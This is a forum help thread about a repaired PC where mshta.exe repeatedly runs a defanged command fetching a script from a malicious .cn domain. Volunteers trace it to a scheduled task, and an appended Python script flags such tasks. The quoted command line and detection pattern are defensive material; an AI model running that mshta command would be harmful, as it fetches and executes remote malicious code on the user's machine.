Author Topic: MSHTA.EXE Problem  (Read 17267 times)


Offline PureITy

  • Jr. Member
  • **
  • Posts: 22
  • I'm a llama!
MSHTA.EXE Problem
« on: February 12, 2009, 04:36:06 PM »
We have a PC in for repair which has an issue with mshta.exe. The problem is that a svchost process is the parent of many mshta.exe children, each having a command line of

mshta.exe hXXp://syhrywbjomwkphwxgknu.cn/s_t_t.php

When this process runs, Avast Antivirus blocks the result as a threat. Scanning the system with Avast, Spybot Search and Destroy, Ad-Aware, SuperantiSpyWare, combofix, Malwarebytes and prevx shows the system to be clean.
There seem to be a few users on the internet having similar issues with this problem. Does anyone know of a fix for the issue?

Many thanks
Paul.
« Last Edit: February 12, 2009, 07:04:06 PM by PureITy »

Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 89029
  • No support PMs thanks
Re: MSHTA.EXE Problem
« Reply #1 on: February 12, 2009, 06:14:41 PM »
What is the purpose of posting the link, as it is to a blocked site (by the network shield), or is this the real reason of the post and not mshta.exe ?

Please modify the link, change the http to hXXP so the link isn't active, possibly exposing people to malware.
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 24.3.6108 (build 24.3.8975.762) UI 1.0.801/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security

Offline PureITy

  • Jr. Member
  • **
  • Posts: 22
  • I'm a llama!
Re: MSHTA.EXE Problem
« Reply #2 on: February 12, 2009, 07:03:09 PM »
Sorry.

The command line should have read "mshta.exe hXXp://syhrywbjomwkphwxgknu.cn/s_t_t.php" where hXXP is http in the actual command line.

Sorry again for the slip!

This process runs every 15 minutes

Paul
« Last Edit: February 12, 2009, 07:06:23 PM by PureITy »

Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 89029
  • No support PMs thanks
Re: MSHTA.EXE Problem
« Reply #3 on: February 12, 2009, 08:21:45 PM »
Yes, but I don't see the relationship between the two, where is this command line coming from ?

What is your firewall ?
As I believe what is an internal MS file like mshta.exe should have any need to access the internet, so something is either manipulating this file or has hacked it to try and connect and a firewall with outbound protection should detect this.

Whilst the file name matches the MS legit file, that is no guarantee it is legit. Try a system search for mshta.exe and report the locations it is in ?

Have you tried running SAS and MBAM from safe mode, they are more effective from there.

AdAware really is a waste of HDD space, IMHO and since both SAS and MBAM offer better detection and cleaning, etc. it really is redundant.

Offline PureITy

  • Jr. Member
  • **
  • Posts: 22
  • I'm a llama!
Re: MSHTA.EXE Problem
« Reply #4 on: February 12, 2009, 10:20:12 PM »
The command line is from the properties of the mshta.exe process in Process Explorer.

We have tried sfc /purgecache but this has had no effect.

Have searched the c: drive for all occurrences of mshta and renamed all of them, but mshta.exe gets respawned.

Will do another scan with SAS and MBAM in safemode tomorrow.

Paul.


Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 89029
  • No support PMs thanks
Re: MSHTA.EXE Problem
« Reply #5 on: February 12, 2009, 10:30:18 PM »
But what were the locations, that was what I was after ?

You should be able to check and alter the properties

It is possible that there is another element that is hidden, possibly by rootkit:
Also see, anti-rootkit, detection, removal & protection http://www.antirootkit.com/software/index.htm. Try these as they are some of the more efficient and user friendly anti-rootkit tools.
- Panda Rootkit Cleaner - http://research.pandasoftware.com/blogs/images/AntiRootkit.zip.
- Trend Micro RootkitBuster - http://www.trendmicro.com/download/rbuster.asp
- F-Secure Blacklight may not always be available, http://www.f-secure.com/blacklight

I only have one occurrence of mshta.exe (XP Pro SP3) and it is in the system32 folder,

For this to try and run it has to have a registry entry, try a registry search (windows start, run, type msconfig) for mshta.exe as a data or value item. Or since there is a 15 repeat check the windows task scheduler and see if there isn't an entry there.

CharleyO

  • Guest
Re: MSHTA.EXE Problem
« Reply #6 on: February 12, 2009, 11:01:41 PM »
***

This file ... mshta.exe ... is a legal MS file and is needed for some operations. But, it could also be a malicious file as sometimes malware writers often name their files similar to legal files, depending on the location of the file. This is why David is asking for the complete location of this file.

Please read the links below for more information and understanding.

http://www.file.net/process/mshta.exe.html

http://www.what-is-exe.com/filenames/mshta-exe.html

http://www.filename.info/f/mshta.exe.html


***

Offline PureITy

  • Jr. Member
  • **
  • Posts: 22
  • I'm a llama!
Re: MSHTA.EXE Problem
« Reply #7 on: February 13, 2009, 07:33:27 PM »
Have run SAS, MBAS and Avast in Safe Mode again today. Problem still exists.

The location of mshta.exe is in c:\windows\system32 and is 45K in size.
Also there are:

MSHTA.EXE-07121ECA.PF in c:\windows\prefetch - 58K
mshta.exe in c:\windows\servicepackfiles\i386 - 29K
mshta.exe.mui in c:\windows\system32\en-US - 3K
mshta.exe in c:\windows\SoftwareDistribution\Download\dd9ab...... - 29K

About to run each of the rootkit removal tools. Already run the AVG Anti-rootkit tool.

Paul.

All American Sweetness

  • Guest
Re: MSHTA.EXE Problem
« Reply #8 on: November 14, 2010, 12:52:59 PM »
I just want to thank you guys.  I too have had this annoying problem and have been searching the internet for days trying to find a way to rid myself of the last traces of this lil' bugger of a problem. This is the ONE forum that finally directed me to the windows task scheduler.  Yay!  I can now go do the dishes.... :)
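
The scheduled-task check that resolved this thread, as an added example (not code from any poster): it reads a verbose CSV export of scheduled tasks and flags any task whose action runs mshta.exe with an http(s) URL or from a path outside the Windows system directory. The sample rows, task names and URL are constructed, and the column names assume English-language `schtasks /query /fo csv /v` output.

```python
import csv
import io
import re

# Constructed sample shaped like `schtasks /query /fo csv /v` output, trimmed
# to three columns. Task names, paths and the URL are placeholders.
SAMPLE_CSV = r'''"TaskName","Task To Run","Repeat: Every"
"Defrag","C:\WINDOWS\system32\defrag.exe c:","Disabled"
"At1","mshta.exe http://placeholder.invalid/page.php","0 Hour(s), 15 Minute(s)"
"Helper","C:\Temp\mshta.exe C:\Temp\local.hta","Disabled"
'''

# Executable token ending in mshta.exe (quoted or bare), then its arguments.
MSHTA_RE = re.compile(r'(?i)(?P<exe>"[^"]*mshta\.exe"|\S*mshta\.exe)\s*(?P<args>.*)')
URL_RE = re.compile(r'(?i)\bhttps?://\S+')
SYSTEM_DIRS = (r'c:\windows\system32', r'c:\windows\syswow64')


def audit_tasks(csv_text):
    """Return (task name, reasons, repeat interval) for suspicious mshta tasks."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        match = MSHTA_RE.search(row.get("Task To Run") or "")
        if not match:
            continue
        reasons = []
        # mshta.exe handed a URL fetches and runs remote HTA content.
        if URL_RE.search(match.group("args")):
            reasons.append("remote URL argument")
        # A full path outside the system directory suggests a look-alike copy.
        directory = match.group("exe").strip('"').lower().rpartition("\\")[0]
        if directory and directory not in SYSTEM_DIRS:
            reasons.append("mshta.exe outside system directory")
        if reasons:
            findings.append((row["TaskName"], reasons, row.get("Repeat: Every", "")))
    return findings


if __name__ == "__main__":
    for name, reasons, repeat in audit_tasks(SAMPLE_CSV):
        print(f"{name}: {', '.join(reasons)} (repeat: {repeat})")
```
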

CharleyO

  • Guest
Re: MSHTA.EXE Problem
« Reply #9 on: November 16, 2010, 12:24:29 PM »
***

Welcome to the forums, All American Sweetness   :)

We are glad you were able to find help here.


***

Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 89029
  • No support PMs thanks
Re: MSHTA.EXE Problem
« Reply #10 on: November 16, 2010, 05:21:34 PM »
No problem, glad I could help.

You have yourself to thank also, managing to find this relatively old topic with a hint about task manager.

Welcome to the forums.